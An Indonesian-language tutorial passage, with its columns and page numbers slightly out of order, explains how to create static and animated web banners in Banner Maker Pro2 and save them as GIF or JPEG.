Selain memanipulasi teks, anda
pun dapat menambahkan gambar
untuk banner anda. Klik tombol
Add Image dan pilih gambar yang
akan anda tambahkan. Klik Next

6

ANIMATION
Klik tombol Add GIF to Animation
List, lalu masukkan kedua file yang
telah anda buat tadi. Silakan atur
waktu dan Properties animasi lain-
nya. Lalu klik tombol Save Animat-
ed Image. Untuk hasil animasi anda,
klik tombol View Animated GIF.

12

gunakan. Melalui tampilan wizard-
nya Banner Maker akan menuntun
anda langkah per langkah dalam
membuat banner yang profesional,
tombol, dan berbagai macam gambar
kecil hanya dalam beberapa menit.
Pada saat program ini dijalankan
untuk pertama kali, anda akan
berhadapan dengan beberapa tab
yang ada pada posisi atas program.

Yang anda perlu lakukan dalam
membuat banner yang menarik
adalah mengikuti tab-tab tersebut
langkah demi langkah hingga ke
proses pembuatan grafik. Berbagai
macam pilihan dapat anda gunakan
dalam memanipulasi teks dari warna

hingga ke 3D. Anda hanya perlu
mengklik tombol ‘Begin’ ketika
pertama kali menjalankan program
ini, dan selanjutnya ikuti saja
langkah per langkahnya.

Program ini sangat powerful dalam
membuat banner. Anda tidak perlu
membuat latar belakangnya sendiri,
karena Banner Maker Pro2 menye-
diakan lebih dari 20 motif latar
belakang. Dengan sedikit latihan,
anda dapat menciptakan sebuah
animasi banner yang sangat menarik
dan profesional yang dapat anda
letakkan di halaman Web anda atau
dapat digunakan untuk pertukaran
banner. Ketika anda selesai membuat

banner, simpanlah sebagai GIF atau
JPEG. Untuk yang bersifat animasi,
anda perlu menyimpannya menjadi
format Animatid GIF.




